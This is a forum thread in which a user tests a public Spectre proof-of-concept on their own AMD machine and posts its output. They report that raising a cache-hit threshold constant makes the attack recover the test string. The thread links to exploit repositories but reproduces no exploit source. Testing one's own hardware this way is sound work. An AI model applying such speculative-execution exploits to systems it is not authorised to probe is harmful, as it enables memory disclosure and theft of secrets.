LinuxQuestions.org
Latest LQ Deal: Latest LQ Deals
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 01-05-2018, 02:04 PM   #1
coralfang
Member
 
Registered: Nov 2010
Location: Bristol, UK
Distribution: Slackware, FreeBSD
Posts: 762
Blog Entries: 3

Rep: Reputation: 246Reputation: 246Reputation: 246
Spectre exploit, how do i know if my system is vulnerable?


I realise media coverage is stating pretty much all CPU's are affected, but i've tried running some exploit code on my system to see it in action;

I just spotted this: https://github.com/Eugnis/spectre-attack

On an AMD FX8320 CPU, i get;
Code:
$ ./spectre.out 
Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfec70... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec71... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec72... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec73... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec74... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec75... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec76... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec77... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec78... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec79... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec7a... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec7b... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec7c... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec7d... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec7e... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec7f... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec80... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec81... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec82... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec83... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec84... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec85... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec86... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec87... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec88... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec89... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec8a... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec8b... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec8c... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec8d... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec8e... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec8f... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec90... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec91... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec92... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec93... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec94... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec95... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec96... Success: 0xFF='?' score=0 
Reading at malicious_x = 0xffffffffffdfec97... Success: 0xFF='?' score=0
Which appears to not be doing much (fails?). I am on 4.14.11 kernel as of now, from what i read this vulnerability has to be patched per application (or even at the compiler level).

How is it supposed to work? I am curious to see the exploit running on my own computer to understand the problem better. Can any explain what this is doing or what this should be doing?
 
Old 01-05-2018, 02:12 PM   #2
coralfang
Member
 
Registered: Nov 2010
Location: Bristol, UK
Distribution: Slackware, FreeBSD
Posts: 762

Original Poster
Blog Entries: 3

Rep: Reputation: 246Reputation: 246Reputation: 246
Apparently changing
Code:
#define CACHE_HIT_THRESHOLD (80)
to
Code:
#define CACHE_HIT_THRESHOLD (300)
gets this to function as written here https://github.com/crozone/SpectrePoC

I guess that is solved as this appears to be working now as it shows:
Code:
$ ./spectre.out 
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfec00... Success: 0x54=’T’ score=2 
Reading at malicious_x = 0xffffffffffdfec01... Success: 0x68=’h’ score=2 
Reading at malicious_x = 0xffffffffffdfec02... Success: 0x65=’e’ score=2 
Reading at malicious_x = 0xffffffffffdfec03... Success: 0x20=’ ’ score=2 
Reading at malicious_x = 0xffffffffffdfec04... Success: 0x4D=’M’ score=2 
Reading at malicious_x = 0xffffffffffdfec05... Success: 0x61=’a’ score=2 
Reading at malicious_x = 0xffffffffffdfec06... Success: 0x67=’g’ score=2 
Reading at malicious_x = 0xffffffffffdfec07... Success: 0x69=’i’ score=2 
Reading at malicious_x = 0xffffffffffdfec08... Success: 0x63=’c’ score=2 
Reading at malicious_x = 0xffffffffffdfec09... Success: 0x20=’ ’ score=2 
Reading at malicious_x = 0xffffffffffdfec0a... Success: 0x57=’W’ score=2 
Reading at malicious_x = 0xffffffffffdfec0b... Success: 0x6F=’o’ score=2 
Reading at malicious_x = 0xffffffffffdfec0c... Success: 0x72=’r’ score=2 
Reading at malicious_x = 0xffffffffffdfec0d... Success: 0x64=’d’ score=2 
Reading at malicious_x = 0xffffffffffdfec0e... Success: 0x73=’s’ score=2 
Reading at malicious_x = 0xffffffffffdfec0f... Success: 0x20=’ ’ score=2 
Reading at malicious_x = 0xffffffffffdfec10... Success: 0x61=’a’ score=2 
Reading at malicious_x = 0xffffffffffdfec11... Success: 0x72=’r’ score=2 
Reading at malicious_x = 0xffffffffffdfec12... Unclear: 0x65=’e’ score=999 (second best: 0x37 score=780)
Reading at malicious_x = 0xffffffffffdfec13... Success: 0x20=’ ’ score=27 (second best: 0xC3 score=11)
Reading at malicious_x = 0xffffffffffdfec14... Success: 0x53=’S’ score=31 (second best: 0xC4 score=13)
Reading at malicious_x = 0xffffffffffdfec15... Success: 0x71=’q’ score=11 (second best: 0x5F score=3)
Reading at malicious_x = 0xffffffffffdfec16... Success: 0x75=’u’ score=9 (second best: 0xEB score=2)
Reading at malicious_x = 0xffffffffffdfec17... Success: 0x65=’e’ score=9 (second best: 0xE5 score=2)
Reading at malicious_x = 0xffffffffffdfec18... Success: 0x61=’a’ score=9 (second best: 0xEE score=2)
Reading at malicious_x = 0xffffffffffdfec19... Success: 0x6D=’m’ score=9 (second best: 0xFA score=2)
Reading at malicious_x = 0xffffffffffdfec1a... Success: 0x69=’i’ score=9 (second best: 0x01 score=2)
Reading at malicious_x = 0xffffffffffdfec1b... Success: 0x73=’s’ score=9 (second best: 0xF7 score=2)
Reading at malicious_x = 0xffffffffffdfec1c... Success: 0x68=’h’ score=9 (second best: 0xEC score=2)
Reading at malicious_x = 0xffffffffffdfec1d... Success: 0x20=’ ’ score=9 (second best: 0xDC score=2)
Reading at malicious_x = 0xffffffffffdfec1e... Success: 0x4F=’O’ score=11 (second best: 0xF6 score=3)
Reading at malicious_x = 0xffffffffffdfec1f... Success: 0x73=’s’ score=9 (second best: 0x9A score=2)
Reading at malicious_x = 0xffffffffffdfec20... Success: 0x73=’s’ score=9 (second best: 0xF6 score=2)
Reading at malicious_x = 0xffffffffffdfec21... Success: 0x69=’i’ score=9 (second best: 0xE2 score=2)
Reading at malicious_x = 0xffffffffffdfec22... Success: 0x66=’f’ score=7 (second best: 0xFF score=1)
Reading at malicious_x = 0xffffffffffdfec23... Success: 0x72=’r’ score=9 (second best: 0xD2 score=2)
Reading at malicious_x = 0xffffffffffdfec24... Success: 0x61=’a’ score=9 (second best: 0xB5 score=2)
Reading at malicious_x = 0xffffffffffdfec25... Success: 0x67=’g’ score=9 (second best: 0xFC score=2)
Reading at malicious_x = 0xffffffffffdfec26... Success: 0x65=’e’ score=11 (second best: 0xE4 score=3)
Reading at malicious_x = 0xffffffffffdfec27... Success: 0x2E=’.’ score=11 (second best: 0x4B score=3)
 
Old 01-05-2018, 02:13 PM   #3
Zyblin
Member
 
Registered: Oct 2013
Distribution: Linux Mint 18.3 (64)
Posts: 175

Rep: Reputation: 20
https://www.linuxquestions.org/quest...ne-4175621005/


Highlighted in Royal Blue there is more info at the above link for AMD. It explains Meltdown and Spectre, etc, whats affected and what is and can be done about it.

Hope it helps.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Spectre - new exploit for ARM cores that have a speculative execution engine implemented - check if your platform is affected abga Slackware - ARM 3 01-10-2018 04:56 AM
[SOLVED] AMD and Spectre... I am confused Zyblin Linux - Hardware 2 01-05-2018 09:09 AM
(HP Spectre Notebook) compatibility Gianfranco Linux - Laptop and Netbook 2 02-14-2017 02:56 AM
LXer: Hot Potato exploit mashes old vulns into Windows System 'sploit LXer Syndicated Linux News 0 01-20-2016 10:51 AM
SpyWare - Linux/UNIX system vulnerable? cmf5150 General 5 01-16-2004 07:25 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 12:26 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration